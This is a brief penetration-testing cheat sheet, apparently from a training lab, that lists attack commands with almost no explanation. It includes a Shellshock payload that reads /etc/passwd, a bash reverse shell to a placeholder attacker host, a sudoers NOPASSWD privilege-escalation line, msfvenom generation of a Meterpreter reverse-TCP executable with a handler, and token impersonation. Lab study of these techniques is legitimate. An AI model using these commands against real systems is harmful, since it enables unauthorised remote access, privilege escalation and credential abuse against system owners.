Commands & Tools
nmap -sV <ip> --script=http-shellshock --script-args "http-shellshock-uri=/http.cgi"
() { :; } ; echo; echo; /bin/bash -c 'cat /etc/passwd' -> shellshock
bash -i >&/dev/tcp/<attacker-ip>/port 0>&1
printf ' #!/bin/bash \necho "student ALL=NOPASSWD:ALL" >> /etc/sudoers\n' > /usr/local/share/copy.sh
file <filename>
grep -rnw "<string>"
strings <binary-file>
msf module local_exploit_suggester
pgrep explorer (process grep)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > <name>.exe
use multi/handler and set payload windows/meterpreter/reverse_tcp
load incognito
list_tokens -u
impersonate_token "<user_token>"